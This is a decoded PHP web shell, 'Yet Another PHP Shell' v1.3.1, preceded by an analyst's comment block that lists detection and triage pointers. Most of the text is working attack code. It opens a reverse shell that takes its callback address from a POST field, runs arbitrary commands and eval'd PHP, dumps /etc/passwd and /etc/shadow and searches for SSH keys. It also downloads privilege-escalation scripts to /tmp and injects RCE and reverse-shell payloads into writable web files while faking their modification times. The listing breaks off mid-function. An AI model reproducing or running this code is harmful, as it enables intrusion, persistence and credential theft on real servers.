
PHP Decode

<?php goto H2UGy; mWaAD: ini_set("\x64\145\146\x61\165\154\164\137\163\157\143\x6b\145\16..

Decoded Output

<?php
/*
 * Analyst notes on this decoded listing (banner: "Yet Another PHP Shell",
 * $version "1.3.1").
 *
 * Reading order: every statement and function definition sits behind a goto
 * label, so file order is not execution order. Execution enters at H2UGy,
 * walks the configuration assignments and function definitions one label at
 * a time, and ends at nPG3i, which either calls stabilize() or opens the
 * socket with fsockopen() and hands control to connect().
 *
 * Decoder artifacts: newline escapes were in places expanded into real line
 * breaks inside string literals, and some inner double quotes lost their
 * escaping (for example the wget --post-data string in duplicate()). Treat
 * the listing as a reading aid; it is not guaranteed to parse as printed.
 *
 * Behaviour visible in the code:
 *  - The callback target defaults to $ip 127.0.0.1 and $port 7359 and can be
 *    overridden by a POST field "x" of the form ip:port or by CLI arguments.
 *  - A GET request carrying "vrfy" returns the fixed body "baguvix" and
 *    exits; duplicate() uses that reply to confirm the script's own URL.
 *  - run_cmd() appends 2>&1 and tries exec, shell_exec, popen, passthru,
 *    proc_open and system in that order; isAvailable() skips any function
 *    named in the disable_functions ini setting.
 *  - runPHP() passes operator-supplied text to eval().
 *  - download() fetches the URLs in $resources (all hosted on
 *    raw.githubusercontent.com) and writes them under /tmp with a 6-7
 *    character alphanumeric name from random_name(); enum() and suggester()
 *    then call chmod() with the decimal literal 777.
 *  - select_files(), choose_payload() and infect() list writable .php files
 *    under the hard-coded web roots, append or prepend a one-line payload,
 *    and put back the previous "Modify" time with touch -d.
 *  - change_password() and toggle_password() rewrite the script's own file
 *    ($_SERVER["SCRIPT_FILENAME"]); check_password() compares a salted
 *    double SHA-512 digest using ==.
 *
 * Detection and triage pointers that follow from the above:
 *  - Web logs: requests with a "vrfy" query parameter, or POST bodies with
 *    x=<ip>:<port> and optionally a "stabilize" field, aimed at a file under
 *    a web root.
 *  - Process telemetry: the PHP worker spawning wget, timeout, base64 or
 *    "php -r", and keeping a long-lived outbound TCP connection
 *    (set_time_limit(0) and ignore_user_abort(1) are both set).
 *  - File system: short random-named files in /tmp; .php files whose content
 *    changed while mtime did not. Only the modify time is reset, so compare
 *    ctime or a file-integrity baseline.
 *  - Hardening: when disable_functions covers all six execution functions,
 *    run_cmd() falls through to returning 0, and connect() exits when
 *    fsockopen is unavailable. runPHP() relies on eval, a language construct
 *    that disable_functions does not cover.
 */
 goto H2UGy; mWaAD: ini_set("default_socket_timeout", pow(99, 6)); goto OLG_c; gCfG6: $color = true; goto p0Ngs; p0Ngs: $use_password = false; goto kemz6; iBvWV: function duplicate() { global $s, $ip, $port, $_SERVER; if (!isset($_SERVER["REQUEST_SCHEME"]) || !isset($_SERVER["HTTP_HOST"]) || !isset($_SERVER["REQUEST_URI"])) { fwrite($s, yellow("[-] ") . "Couldn't find YAPS URL. Did you run me via command line?
Please provide the correct YAPS URL (example.com/files/yaps.php): "); while ($yaps_url = fread($s, 256)) { if (get_request(preg_replace("/\xa/", '', $yaps_url . "?vrfy")) !== "baguvix") { return fwrite($s, red("[-] ") . "Couldn't validade YAPS URL. Is this the correct URL?\xa"); } break; } $curl_url = $yaps_url; } else { $curl_url = $_SERVER["REQUEST_SCHEME"] . "://" . $_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"]; echo $curl_url; } fwrite($s, cyan("[*] ") . "Choose a port to listen (default: {$port}): "); while ($new_port = fread($s, 32)) { $new_port = base64_encode($new_port) == "Cg==" ? $port : substr($new_port, 0, -1); $socket = array("x" => $ip . ":" . $new_port); fwrite($s, "Connecting to " . $ip . ":" . $new_port . "\xa"); $cmd = "wget -qO- --post-data="" . http_build_query($socket) . "" {$curl_url} > /dev/null"; if (isAvailable("popen") && isAvailable("pclose")) { pclose(popen($cmd . " &", "r")); } else { run_cmd("timeout --kill-after 0 1 " . $cmd); } return; } } goto rHlHg; kXDc2: ignore_user_abort(1); goto y1ZOn; Sjo8m: function random_name($name = '') { $charset = implode('', array_merge(range("A", "Z"), range("a", "z"), range(0, 9))); for ($i = 0; $i <= mt_rand(5, 6); $i++) { $name .= $charset[mt_rand(0, strlen($charset) - 1)]; } return $name; } goto CWqQu; gn8lq: $short_args = "u::h::s::"; goto EKCVq; hZBFi: $ip = "127.0.0.1"; goto xn2Of; CWqQu: function download($url, $saveTo) { $randomName = random_name(); $content = get_request($url); if (isAvailable("file_put_contents")) { if (file_put_contents($saveTo . "/" . $randomName, $content)) { return $randomName; } } if (isAvailable("fopen") && isAvailable("fwrite") && isAvailable("fclose")) { $fp = fopen($saveTo . "/" . 
$randomName, "w"); if (fwrite($fp, $content)) { fclose($fp); return $randomName; } } return false; } goto S9wqS; H2UGy: $version = "1.3.1"; goto KkL02; f9SPd: function cmd_not_found($cmd) { global $s, $commands; foreach ($commands as $valid_cmd) { similar_text($cmd, $valid_cmd, $percentage); if ($percentage > 70) { fwrite($s, yellow("[!] ") . "Command '!{$cmd}' not found. Did you mean '!" . $valid_cmd . "'?.\xa"); return; } } fwrite($s, yellow("[!] ") . "Command '!" . substr($c, 1, -1) . "' not found. Use !help.
"); return; } goto VcfR6; jTCyq: $silent = false; goto LrEcv; WYwps: function passwd() { global $s, $use_password; if ($use_password) { if (!check_password()) { fwrite($s, red("[-] ") . " Wrong password
"); return; } fwrite($s, green("[+] Password is enabled. ") . white("Choose an option:") . "\xa[1] Change password\xa[2] Disable password
[3] Cancel
> "); while ($data = fread($s, 8)) { switch (substr($data, 0, -1)) { case "1": fwrite($s, cyan("[*] ") . "Choose the new password: "); while ($data2 = fread($s, 1024)) { $newPass = substr($data2, 0, -1); change_password($newPass); return; } break; case "2": toggle_password(); return; break; default: fwrite($s, cyan("[*] ") . "Canceled.
"); return; break; } } } else { fwrite($s, yellow("[!] Password is disabled. ") . white("Choose an option:") . "
[1] Set a password\xa[2] Enable password
[3] Cancel
> "); while ($data = fread($s, 8)) { switch (substr($data, 0, -1)) { case "1": fwrite($s, cyan("[*] ") . "Choose the new password: "); while ($data2 = fread($s, 1024)) { $newPass = substr($data2, 0, -1); change_password($newPass); return; } break; case "2": toggle_password(); return; break; default: fwrite($s, cyan("[*] ") . "Canceled.\xa"); return; break; } } } } goto iBvWV; SqGTY: if ($auto_verify_update) { verify_update(); } goto nPG3i; S9wqS: function enum() { global $s, $resources; $downloadLinpeas = download($resources["linpeas"], "/tmp/"); $downloadLinenum = download($resources["linenum"], "/tmp"); if ($downloadLinpeas) { fwrite($s, green("[+]") . " Linpeas saved to /tmp/" . $downloadLinpeas . cyan("
[i] Changing permissions...
")); if (chmod("/tmp/" . $downloadLinpeas, 777)) { fwrite($s, green("[+]") . " Permissions changed! \xa[i] You can run it with " . yellow("sh /tmp/" . $downloadLinpeas . " | tee /tmp/linpeas.log\xa
")); } else { fwrite($s, yellow("[!]") . " Couldn't change permissions... \xa[i] File was saved in " . yellow("/tmp/" . $downloadLinpeas . "
\xa")); } } if ($downloadLinenum) { fwrite($s, green("[+] Linenum saved to /tmp/" . $downloadLinenum) . cyan("
[i] Changing permissions...\xa")); if (chmod("/tmp/" . $downloadLinenum, 777)) { fwrite($s, green("[+]") . " Permissions changed! \xa[i] You can run it with " . yellow("sh /tmp/" . $downloadLinenum . " | tee /tmp/linenum.log\xa")); } else { fwrite($s, yellow("[!]") . " Couldn't change permissions... \xa[i] File was saved in " . yellow("/tmp/" . $downloadLinenum . "
")); } } } goto r2M4e; uIseZ: function usage() { global $banner, $version; return $banner . "\xa" . yellow("Usage:") . white("
There are three ways you can start the connection:\xa") . green("1. Via command line in the compromised host;") . "
	E.g: $ php yaps.php [options] [ip port|ip:port]\xa" . green("2. Making a POST request to the file with the parameter "x";") . "
	E.g: $ curl -X POST -d "x=192.168.73.59:7359" hacked.com/uploads/yaps.php\xa" . green("3. Making a GET request without parameters (will connect to the hardcoded socket);") . "\xa	E.g: $ curl hacked.com/uploads/yaps.php\xa" . yellow("Options:") . white("
-h, --help:     Show this help
-s, --silent:   Silent mode (does not display banner)
-u, --update:   Check if YAPS is up to date
") . yellow("Examples (suppose your IP is 192.168.73.59):") . "
infected@host:~$ php yaps.php -s 192.168.73.59 4444
infected@host:~$ php yaps.php 192.168.73.59:8080\xayour@machine:~$ curl -X POST -d "x=192.168.73.59" hacked.com/uploads/yaps.php\xa"; } goto TWD7O; lGppC: function select_files() { global $s; $webdir = array("/var/www/", "/srv/", "/usr/local/apache2/", "/var/apache2/", "/var/www/nginx-default/"); $webfiles_arr = array(); foreach ($webdir as $dir) { try { $list = getFiles($dir); $webfiles_arr = array_merge($webfiles_arr, $list); } catch (Exception $e) { } } if (count($webfiles_arr) > 0) { fwrite($s, cyan("[*] ") . white("Found " . count($webfiles_arr) . " writable PHP files:
")); } for ($i = 0; $i < count($webfiles_arr); $i++) { fwrite($s, red("[{$i}] ") . $webfiles_arr[$i] . PHP_EOL); } fwrite($s, cyan("
[*] ") . white("Choose the files you want to infect.\xa    Separate by comma (e.g:1,5,7,8) and/or by range (e.g:10-16).
    Files: ")); while ($data2 = fread($s, 1024)) { $files = str_replace(" ", '', substr($data2, 0, -1)); $files = explode(",", $files); if (count($files) == 1 && $files[0] == '') { return; } $toInfect = array(); foreach ($files as $file) { if (preg_match("/^[0-9]+$/", $file)) { array_push($toInfect, $file); } if (preg_match("/^[0-9]+\-[0-9]+$/", $file)) { $range = explode("-", $file); if ((int) $range[0] < (int) $range[1]) { for ($i = (int) $range[0]; (int) $i <= $range[1]; $i++) { array_push($toInfect, $i); } } } } sort($toInfect, SORT_NUMERIC); choose_payload($webfiles_arr, array_unique($toInfect)); return; } } goto V18g8; LrEcv: if (isset($_GET["vrfy"])) { die("baguvix"); } goto mBQZf; gxovs: function getPHP() { global $s; $php = ''; fwrite($s, cyan("[*]") . " Write your PHP code (*without* PHP tags). To send and run it, use " . green("!php") . ". " . yellow("
[i] Note that this is NOT an interactive PHP shell. Max input: 4096 bytes.") . white("\xaphp> ")); while ($c = fread($s, 4096)) { if (substr($c, 0, -1) == "!php") { return $php; } if (substr($c, 0, -1) == "!cancel") { return 0; } fwrite($s, white("php> ")); $php .= $c; } return $php; } goto o75dl; TwUwH: if (isset($_POST["x"]) && strpos($_POST["x"], ":") !== false) { $skt = explode(":", $_POST["x"]); $ip = $skt[0]; $port = $skt[1]; } goto oxSzT; efuXl: function run_cmd($c) { $c = $c . " 2>&1
"; if (isAvailable("exec")) { $stdout = array(); exec($c, $stdout); $stdout = join(chr(10), $stdout) . chr(10); } else { if (isAvailable("shell_exec")) { $stdout = shell_exec($c); } else { if (isAvailable("popen")) { $fp = popen($c, "r"); $stdout = NULL; if (is_resource($fp)) { while (!feof($fp)) { $stdout .= fread($fp, 1024); } } @pclose($fp); } else { if (isAvailable("passthru")) { ob_start(); passthru($c); $stdout = ob_get_contents(); ob_end_clean(); } else { if (isAvailable("proc_open")) { $handle = proc_open($c, array(array("pipe", "r"), array("pipe", "w"), array("pipe", "w")), $pipes); $stdout = NULL; while (!feof($pipes[1])) { $stdout .= fread($pipes[1], 1024); } @proc_close($handle); } else { if (isAvailable("system")) { ob_start(); system($c); $stdout = ob_get_contents(); ob_end_clean(); } else { $stdout = 0; } } } } } } return $stdout; } goto FlzCk; CXh7h: $pass_hash = "f00945860424fa6148e329772c08e7d05d7fab6f69a4722b4c66c164acdb018ecc0cbc62060cc67e7ae962c65ab5967620622cc12206627229b94106b66db6b8"; goto JzPAK; ZqmNp: function check_password() { global $s, $pass_hash, $salt; fwrite($s, yellow("[i] ") . "This shell is protected. 
Enter the password: "); while ($data = fread($s, 1024)) { $entered_pass = substr($data, 0, -1); return hash("sha512", $salt . hash("sha512", $entered_pass, false), false) == $pass_hash ? true : false; } } goto ssUNI; JzPAK: $auto_verify_update = false; goto jTCyq; y1ZOn: ini_set("max_execution_time", 0); goto mWaAD; OLG_c: $resources = array("linpeas" => "https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh", "linenum" => "https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh", "suggester" => "https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh", "verifyUpdateURL" => "https://raw.githubusercontent.com/Nickguitar/YAPS/main/version", "updateURL" => "https://raw.githubusercontent.com/Nickguitar/YAPS/main/yaps.php"); goto hZBFi; wu7kB: function sysinfo() { global $s; fwrite($s, green("\xa====================== Initial info ======================
\xa")); $info = cyan("[i] OS info:\xa") . run_cmd("lsb_release -a | grep -v 'No LSB'") . PHP_EOL; $info .= cyan("[i] Hostname: ") . run_cmd("hostname"); $info .= cyan("[i] Kernel: ") . run_cmd("uname -a"); $info .= cyan("[i] CPU: \xa") . run_cmd("cat /proc/cpuinfo | grep -i 'model name' | cut -d':' -f 2 | sed 's/^ *//g'"); $info .= cyan("[i] RAM: \xa") . run_cmd("cat /proc/meminfo | egrep -i '(memtotal|memfree)'"); $info .= cyan("[i] Sudo version: ") . run_cmd("sudo --version | grep 'Sudo version' | cut -d' ' -f 3"); $info .= cyan("[i] User/groups: ") . run_cmd("id") . PHP_EOL; $info .= cyan("[i] Active TTY: \xa") . run_cmd("w") . PHP_EOL; fwrite($s, $info); fwrite($s, green("====================== Users info ======================
\xa")); $info = cyan("[i] Current user: ") . run_cmd("whoami"); $info .= cyan("[i] Users in /home: \xa") . run_cmd("ls /home") . PHP_EOL; $info .= cyan("[i] Crontab of current user: \xa") . run_cmd("crontab -l | egrep -v '^#'") . PHP_EOL; $info .= cyan("[i] Crontab: 
") . run_cmd("cat /etc/crontab | egrep -v '^#'") . PHP_EOL; fwrite($s, $info); fwrite($s, green("====================== All users ======================\xa\xa")); fwrite($s, run_cmd("cat /etc/passwd") . PHP_EOL); if (is_readable("/etc/shadow")) { fwrite($s, red("[!] /etc/shadow is readable!
") . run_cmd("cat /etc/shadow") . PHP_EOL); } fwrite($s, green("====================== Net info ======================\xa\xa")); $info = cyan("[i] IP Info: 
") . run_cmd("ifconfig") . PHP_EOL; $info .= cyan("[i] Hosts: 
") . run_cmd("cat /etc/hosts | grep -v '^#'") . PHP_EOL; $info .= cyan("[i] Interfaces/routes: \xa") . run_cmd("cat /etc/networks && route") . PHP_EOL; $info .= cyan("[i] IP Tables rules: 
") . run_cmd("(iptables --list-rules 2>/dev/null)") . PHP_EOL; $info .= cyan("[i] Active ports: \xa") . run_cmd("(netstat -punta) 2>/dev/null") . PHP_EOL; fwrite($s, $info); fwrite($s, green("====================== Interesting binaries ======================

")); $interesting_binaries = array("nc", "nc.traditional", "ncat", "nmap", "perl", "python", "python2", "python2.6", "python2.7", "python3", "python3.6", "python3.7", "ruby", "node", "gcc", "g++", "docker", "php"); foreach ($interesting_binaries as $binary) { $binary = shell_exec("which {$binary} 2>/dev/null"); if ($binary !== '' && base64_encode($binary . PHP_EOL) !== "Cg==") { fwrite($s, run_cmd("ls -l {$binary}")); } } fwrite($s, green("
====================== SUID binaries ======================
\xa")); $suid_list = explode("
", shell_exec("find / -type f -perm /4000 2>/dev/null")); foreach ($suid_list as $suid) { if ($suid !== '') { fwrite($s, run_cmd("ls -l {$suid}")); } } fwrite($s, green("\xa====================== SSH files ======================\xa
")); $authorized_keys = explode("
", shell_exec("find / -type f -name authorized_keys 2>/dev/null")); foreach ($authorized_keys as $public_key) { if (is_writable($public_key)) { fwrite($s, red("[Writable] ") . $public_key . PHP_EOL); } else { fwrite($s, $public_key . PHP_EOL); } } $id_rsa = explode("
", shell_exec("find / -type f -name id_rsa 2>/dev/null")); foreach ($id_rsa as $priv_key) { if (is_readable($priv_key)) { fwrite($s, red("[Readable] ") . $priv_key . PHP_EOL); } else { fwrite($s, $priv_key . PHP_EOL); } } fwrite($s, green("
=================== Writable PHP files ===================\xa
")); $webfiles_arr = array(); $webdir = array("/var/www", "/srv", "/usr/local/apache2", "/var/apache2", "/var/www/nginx-default"); foreach ($webdir as $dir) { $webfiles_arr = array_merge($webfiles_arr, explode("
", shell_exec("find " . $dir . " -type f -name '*.php*' -writable 2>/dev/null"))); } if (count($webfiles_arr) > 25) { for ($i = 0; $i < 25; $i++) { if ($webfiles_arr[$i] !== '') { fwrite($s, red("[Writable] ") . $webfiles_arr[$i] . PHP_EOL); } } fwrite($s, "...
..." . PHP_EOL); fwrite($s, green("[+] ") . "Showing only the first 25 files. There are more!" . PHP_EOL); } else { foreach ($webfiles_arr as $file) { if ($file !== '') { fwrite($s, red("[Writable] ") . $file . PHP_EOL); } } } fwrite($s, cyan("
[i]") . " Get more information with !enum." . PHP_EOL); } goto Sjo8m; KkL02: set_time_limit(0); goto kXDc2; QBC7U: $commands = array("all-colors", "color", "duplicate", "enum", "help", "infect", "info", "passwd", "php", "stabilize", "suggester"); goto UVSoS; Wuvgt: function refresh_ps1($changecolor = false) { global $ps1_color, $ps1; $user = str_replace(PHP_EOL, '', run_cmd("whoami")); if (!$ps1_color) { $ps1 = white("[YAPS] ") . str_replace(PHP_EOL, '', green($user . "@" . run_cmd("hostname")) . ":" . cyan(run_cmd("pwd")) . "$ "); if ($user == "root") { $ps1 = white("[YAPS] ") . str_replace(PHP_EOL, '', red($user . "@" . run_cmd("hostname")) . ":" . cyan(run_cmd("pwd")) . "# "); } if ($changecolor) { $ps1_color = true; } } else { $ps1 = white("[YAPS] ") . str_replace(PHP_EOL, '', $user . "@" . run_cmd("hostname") . ":" . run_cmd("pwd") . "$ "); if ($user == "root") { $ps1 = white("[YAPS] ") . str_replace(PHP_EOL, '', $user . "@" . run_cmd("hostname") . ":" . run_cmd("pwd") . "# "); } if ($changecolor) { $ps1_color = false; } } } goto gxovs; vng9E: function infect($allFiles, $fileArr, $payload_index, $payload_list, $position = 1) { global $s; $payload = $payload_list[array_keys($payload_list)[$payload_index]]; fwrite($s, yellow("\xa[!] ") . white("Files to infect:
")); foreach ($fileArr as $fileToInfect) { fwrite($s, $allFiles[$fileToInfect] . "
"); } fwrite($s, yellow("[!] ") . white("Payload: ") . $payload_list[array_keys($payload_list)[$payload_index]] . "\xa"); $position_str = $position ? "End of file" : "Beginnig of file"; fwrite($s, yellow("[!] ") . white("Position: ") . $position_str . "
"); fwrite($s, cyan("[?] ") . white("Are you sure you want to infect those files? [Y/n]")); while ($sure = fread($s, 128)) { if (strtolower(substr($sure, 0, 1)) == "n") { return; } break; } foreach ($fileArr as $fileToInfect) { $filePath = $allFiles[$fileToInfect]; if (isAvailable("file_get_contents") && isAvailable("file_put_contents")) { $old = file_get_contents($filePath); $originalDate = str_replace("
", '', run_cmd("stat " . $filePath . " | grep Modify | sed "s/Modify: //"")); if ($position) { $written = file_put_contents($filePath, "\xa" . $payload, FILE_APPEND) ? 1 : 0; } else { $written = file_put_contents($filePath, $payload . "\xa" . $old) ? 1 : 0; } $result = $written ? green("[+] ") . white($filePath . " was infected with payload !") : red("[-] ") . white($filePath . " Error!"); fwrite($s, $result . "\xa"); if (run_cmd("touch -d " . """ . $originalDate . "" " . $filePath)) { fwrite($s, green("[+] ") . white("Mantained original 'modified date' (" . $originalDate . ").
")); } } } return; } goto idP0M; EKCVq: $long_args = array("update::", "help::", "silent::"); goto iyx8E; kemz6: $salt = "v_3_r_Y___G_o_0_d___s_4_L_t"; goto CXh7h; o75dl: function runPHP($code) { try { ob_start(); eval($code); $result = ob_get_contents(); ob_end_clean(); } catch (Throwable $ex) { $err = explode("Stack trace:", $ex); $result = $err[0]; } return $result; } goto Wym75; jsOgp: function getFiles($dir) { $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($dir)); $list = array(); foreach ($iterator as $file) { if (!is_dir($file) && is_writable($file)) { if ($file->getPathName() !== $_SERVER["SCRIPT_FILENAME"]) { if (substr($file->getPathName(), -4) == ".php") { array_push($list, $file->getPathName()); } } } } sort($list); return $list; } goto lGppC; sfKGX: function toggle_password() { global $use_password, $s, $yaps; $yaps_code = file_get_contents($yaps); if ($use_password) { $new_yaps_code = preg_replace("/(\$use_password += +)(true)/", "$1false", $yaps_code, 1); if (file_put_contents($yaps, $new_yaps_code)) { $use_password = false; fwrite($s, green("[+] ") . "Password deactivated.
"); return true; } fwrite($s, red("[-] ") . "Couldn't deactivate password.\xa"); return false; } $new_yaps_code = preg_replace("/(\$use_password += +)(false)/", "$1true", $yaps_code, 1); if (file_put_contents($yaps, $new_yaps_code)) { $use_password = false; fwrite($s, green("[+] ") . "Password activated.\xa"); return true; } fwrite($s, red("[-] ") . "Couldn't activate password.
"); return false; } goto WYwps; pGTWf: if (isset($options["u"]) || isset($options["update"])) { die(verify_update()); } goto MwOOd; rHlHg: function get_request($url) { $response = false; if (isAvailable("file_get_contents")) { $response = file_get_contents($url); } elseif (isAvailable("fread") && isAvailable("fopen") && ini_get("allow_url_fopen")) { $response = fread(fopen($url, "r"), 10); } elseif (in_array("curl", get_loaded_extensions())) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $response = curl_exec($ch); curl_close($ch); } elseif ($tmp_curl = run_cmd("curl -s " . $url)) { $response = $tmp_curl; } elseif ($tmp_wget = run_cmd("wget -qO- " . $url)) { $response = $tmp_wget; } return $response; } goto MIocV; zJ69L: if (php_sapi_name() == "cli") { if ($argc >= 2 && preg_match("/^[0-9]+$/", $argv[$argc - 1])) { $port = $argv[$argc - 1]; $ip = $argv[$argc - 2]; } else { foreach ($argv as $arg) { if (strpos($arg, ":") !== false) { $socket = explode(":", $arg); $ip = $socket[0]; $port = (int) $socket[1]; } } } } goto QBC7U; UVSoS: function green($str) { global $color; return $color ? "\33[92m" . $str . "\x1b[0m" : $str; } goto uFC47; idP0M: function parse_stdin($input) { global $s, $color; switch (substr($input, 0, -1)) { case "!all-colors": $color = !$color; break; case "!info": return sysinfo(); break; case "!enum": return enum(); break; case "!suggester": return suggester(); break; case "!color": refresh_ps1(true); break; case "!help": return help(); break; case "!php": $phpCode = getPHP(); if ($phpCode !== 0) { $result = runPHP($phpCode); fwrite($s, $result); } else { fwrite($s, yellow("[i] Code canceled.") . 
PHP_EOL); } break; case "!stabilize": stabilize(); break; case "!backdoor": backdoor(); break; case "!passwd": passwd(); break; case "!duplicate": duplicate(); break; case "!infect": select_files(); break; } } goto f9SPd; k28_t: if (isset($options["h"]) || isset($options["help"])) { die(usage()); } goto pGTWf; ssUNI: function change_password($new) { global $salt, $yaps, $s; $new_hash = hash("sha512", $salt . hash("sha512", $new, false), false); if (!is_readable($yaps) || !is_writable($yaps)) { return false; } $yaps_code = file_get_contents($yaps); $new_yaps_code = preg_replace("/[a-f0-9]{128}/", $new_hash, $yaps_code, 1); if (file_put_contents($yaps, $new_yaps_code)) { fwrite($s, green("[+] ") . "Password changed. Changes will take effect on next connection.\xa"); return true; } else { fwrite($s, red("[-] ") . "Couldn't read or write the file. Are the permissions right?\xa" . run_cmd("ls -l " . $yaps . "
")); return false; } } goto sfKGX; oxSzT: $banner = cyan("
       o   o   O    o--o   o-o\xa        \ /   / \   |   ) (\xa         O   o---o  O--o   o-o
         |   |   |  |         )
         o   o   o  o     o--o
        Yet Another  PHP  Shell") . "\xa              Version " . $version . "
       Coder: Nicholas Ferreira"; goto gn8lq; mBQZf: $yaps = $_SERVER["SCRIPT_FILENAME"]; goto TwUwH; V18g8: function choose_payload($allFiles, $toInfect) { global $s; $payloads = array("0. TinyRCE\x9" => "<?=`$_REQUEST[0]`;?>", "1. ClassicRCE\x9" => "<?=@system($_REQUEST[0]);?>", "2. Eval\x9\x9" => "<?=@eval($_REQUEST[0]);?>", "3. BasedEval\x9" => "<?=@eval(base64_decode($_REQUEST[0]));?>", "4. RemotePHP	" => "<?=@eval(file_get_contents($_REQUEST[0]));?>", "5. RemoteUpload\x9" => "<?=$x=rand(100,999);@file_put_contents("./".$x.".".$_REQUEST[1],@file_get_contents($_REQUEST[0]));echo $x.$_REQUEST[1];?>", "6. LocalUpload\x9" => "<?php if(isset($_FILES["0"]))if(move_uploaded_file($_FILES["0"]["tmp_name"],"_".$_FILES["0"]["name"]))echo"Uploaded: _".$_FILES["0"]["name"];?>", "7. StableShell\x9" => "<?php $a="script -qc /bin/bash /dev/null";umask(0);$b=fsockopen($_REQUEST[0],$_REQUEST[1],$c,$d,30);$e=array(0=>array("pipe","r"),1=>array("pipe","w"),2=>array("pipe","w"));$f=proc_open($a,$e,$g);foreach($g as $p)stream_set_blocking($p,0);stream_set_blocking($b,0);while(!feof($b)){$i=array($b,$g[1],$g[2]);if(in_array($b,$i))fwrite($g[0],fread($b,2048));if(in_array($g[1],$i))fwrite($b,fread($g[1],2048));if(in_array($g[2],$i))fwrite($b,fread($g[2],2048));}fclose($b);foreach($g as $p)fclose($p);proc_close($f);?>"); fwrite($s, cyan("
[i] ") . white("List of payloads available:
")); $i = true; foreach ($payloads as $name => $code) { $desc = $i ? cyan($name) . $code : cyan($name) . white($code); fwrite($s, $desc . "
"); $i = !$i; } fwrite($s, cyan("
[?] ") . white("Choose a payload to infect the selected files (default:0): ")); while ($choosed_payload = fread($s, 128)) { $user_payload = 0; if ((int) $choosed_payload <= count($payloads) + 1) { $user_payload = $choosed_payload; } break; } fwrite($s, cyan("[?] ") . white("Do you want do insert the payload at the beginning [0] or end [1] of the file (default: 1)? ")); while ($position = fread($s, 128)) { $position = 1; if ((int) $position === 0) { $position = 0; } break; } infect($allFiles, $toInfect, (int) $user_payload, $payloads, (int) $position); return; } goto vng9E; x3nOo: function white($str) { global $color; return $color ? "\x1b[97m" . $str . "\x1b[0m" : $str; } goto ixO3W; r2M4e: function suggester() { global $s, $resources; $download = download($resources["suggester"], "/tmp/"); if ($download) { fwrite($s, green("[+]") . " Linux Exploit Suggester saved to /tmp/" . $download . cyan("
[i]") . " Changing permissions...
"); if (chmod("/tmp/" . $download, 777)) { fwrite($s, green("[+]") . " Permissions changed! 
[i] You can run it with " . yellow("sh /tmp/" . $download . " | tee /tmp/LES.log\xa")); } else { fwrite($s, yellow("[!]") . " Couldn't change permissions... \xa[i] File was saved in " . yellow("/tmp/" . $download . "\xa")); } } return; } goto Wuvgt; iWGdZ: function backdoor() { } goto ZqmNp; VcfR6: function connect() { global $use_password, $commands, $ps1, $s, $silent; refresh_ps1(1); if (!isAvailable("fsockopen")) { die(red("[-]") . " Function 'fsockopen' isn't available."); } if ($use_password) { if (!check_password()) { die(fwrite($s, red("[-]") . " Wrong password.
")); } } if (!isset($_REQUEST["silent"]) && !isset($_REQUEST["s"]) && !$silent) { fwrite($s, banner() . "
"); } refresh_ps1(); fwrite($s, "
" . $ps1); while ($c = fread($s, 2048)) { $out = ''; if (substr($c, 0, 1) == "!") { if (in_array(strtolower(substr($c, 1, -1)), $commands)) { $out = parse_stdin($c); } else { cmd_not_found(substr($c, 1, -1)); } } elseif (substr($c, 0, 3) == "cd ") { chdir(substr($c, 3, -1)); } elseif (substr($c, 0, -1) == "exit") { fwrite($s, yellow("[i] ") . "Closing connection.\xa"); fclose($s); die; } else { $out = run_cmd(substr($c, 0, -1)); } if ($out === false) { fwrite($s, red("[-] There are no exec functions")); break; } refresh_ps1(); fwrite($s, $out . $ps1); } fclose($s); } goto SqGTY; ixO3W: function banner() { global $banner; return $banner . white("\xa   This is ") . red("NOT") . white(" an interactive shell.\xa       Use ") . green("!help") . white(" to see commands."); } goto uIseZ; LavC2: function help() { $help = "
" . green("Useful commands:") . "
  " . cyan("!help") . "
  \x9Display this menu
  " . cyan("!all-colors") . "\xa  \x9Toggle all colors (locally only)\xa  " . cyan("!color") . "\xa  	Toggle $PS1 color (locally only)
  " . cyan("!duplicate") . "\xa  \x9Spawn another reverse shell\xa  " . cyan("!enum") . "\xa  	Download Linpeas and Linenum to /tmp and get it ready to run\xa  " . cyan("!infect") . "
  \x9Inject payloads into PHP files\xa  " . cyan("!info") . "\xa  	List information about target
  " . cyan("!passwd") . "\xa  	Show options for password	
  " . cyan("!php") . "\xa  	Write and run PHP code on the remote host\xa  " . cyan("!stabilize") . "\xa  	Stabilize to an interactive shell
  " . cyan("!suggester") . "
  	Download Linux Exploit Suggester to /tmp and get it ready to run
  
" . green("Command line options:") . "
  " . white("$ php yaps.php [--update|-u]") . "
  \x9Check if YAPS is up to date
  " . white("$ php yaps.php ip port") . "
  \x9Connect to ip:port\xa"; return $help; } goto efuXl; TWD7O: function isAvailable($function) { $dis = ini_get("disable_functions"); if (!empty($dis)) { $dis = preg_replace("/[, ]+/", ",", $dis); $dis = explode(",", $dis); $dis = array_map("trim", $dis); } else { $dis = array(); } if (is_callable($function) and !in_array($function, $dis)) { return true; } return false; } goto LavC2; uFC47: function red($str) { global $color; return $color ? "\x1b[91m" . $str . "\x1b[0m" : $str; } goto SQe5k; MIocV: function verify_update() { global $version, $resources; $newest_version = 0; echo cyan("[i] ") . "Your version: {$version}. Checking for updates...\xa"; $request = get_request($resources["verifyUpdateURL"]); if ($request) { $newest_version = $request; } $newest_version_ = (int) str_replace(".", '', $newest_version); $version_ = (int) str_replace(".", '', $version); if ($newest_version_ !== 0 && $newest_version_ > $version_) { echo red("[i]") . " Your version is not up to date.
